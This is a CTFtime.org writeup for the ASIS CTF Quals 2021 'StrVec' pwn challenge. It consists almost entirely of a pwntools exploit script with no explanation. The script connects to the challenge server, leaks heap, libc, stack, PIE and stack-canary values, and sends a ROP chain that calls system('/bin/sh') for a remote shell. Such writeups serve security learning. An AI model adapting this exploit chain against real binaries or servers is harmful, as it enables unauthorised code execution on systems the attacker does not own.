CTFtime.org / ASIS CTF Quals 2021 / StrVec / Writeup

```
from pwn import *

context.log_level = 'debug'
# p = process('./strvec')
p = remote('168.119.108.148', 12010)
libc = ELF('./libc-2.31.so')

def setValue(index, data, withline = True):
p.sendlineafter('>', '2')
p.sendlineafter('idx =', str(index))
if withline:
p.sendlineafter('data =', data)
else:
p.sendafter('data =', data)

def getValue(index):
p.sendlineafter('>', '1')
p.sendlineafter('idx =', str(index))

name = p64(0) + p64(0x31)[:-2]
p.sendlineafter(':', name)
p.sendlineafter('n = ', str(0x1fffffff + 4))

setValue(100, 'A'*0x8)
setValue(7, 'B'*8)
setValue(6, 'B'*8)

getValue(100)

heap_leak = u64(p.recvline()[-7:-1].ljust(8, b'\0'))
heap_base = heap_leak - 0x330

info('heap_leak: ' + hex(heap_leak))
info('heap_base: ' + hex(heap_base))

setValue(102, p64(heap_base + 0x3a0))
setValue(103, p64(0) + p64(0x511))
setValue(104, p64(heap_base + 0x3a0))

for i in range(106, 115):
setValue(i, 'C'*8)

for i in range(110, 180):
setValue(6 * i, p64(0x510) + p64(0x21))

setValue(0x23, 'ZZZZ')
getValue(0x17)

libc_leak = u64(p.recvline()[-7:-1].ljust(8, b'\0'))
libc_base = libc_leak - 0x1ebbe0
libc_environ = libc_base + 0x1ef2e0

info('libc_leak: ' + hex(libc_leak))
info('libc_base: ' + hex(libc_base))
info('libc_environ: ' + hex(libc_environ))

setValue(0x23, p64(libc_environ))
getValue(0x1f)

stack_leak = u64(p.recvline()[-7:-1].ljust(8, b'\0'))
name_ptr = stack_leak - 0x128 + 0x10
pie_ptr = name_ptr + 0x40
canary_ptr = name_ptr + 0x8

info('stack_leak: ' + hex(stack_leak))
info('name_ptr: ' + hex(name_ptr))
info('pie_ptr: ' + hex(pie_ptr))
info('canary_ptr: ' + hex(canary_ptr))

setValue(0x23, p64(pie_ptr) + p64(canary_ptr + 1))
getValue(0x203)

pie_leak = u64(p.recvline()[-7:-1].ljust(8, b'\0'))
pie_base = pie_leak - 0x16c0

info('pie_leak: ' + hex(pie_leak))
info('pie_base: ' + hex(pie_base))

getValue(0x204)

canary = u64(b'\0' + p.recvline()[-8:-1].ljust(7, b'\0'))
info('canary: ' + hex(canary))

setValue(0x31, p64(name_ptr) + p64(heap_base + 0x2a0))
setValue(0x1f, "AAAA")

leave_ret = pie_base + 0x1666
pop_rdi_ret = pie_base + 0x1723
ret = pop_rdi_ret + 1

payload = p64(pop_rdi_ret)
payload += p64(libc_base + next(libc.search(b'/bin/sh\0')))
payload += p64(libc_base + libc.sym['system'])

setValue(0x38, p64(0) + p64(canary) + p64(heap_base + 0x948 + 0x10) + p64(leave_ret)[:-2])

setValue(6*110, p64(heap_base + 0x2a0) + p64(heap_base + 0x10))

for i in range(111, 180):
setValue(6 * i, payload)

setValue(0x20, p64(0)*2)
setValue(0, p64(0))

pause()
p.sendlineafter('>', '3')
p.interactive()
```

StrVec

Comments

Sign in with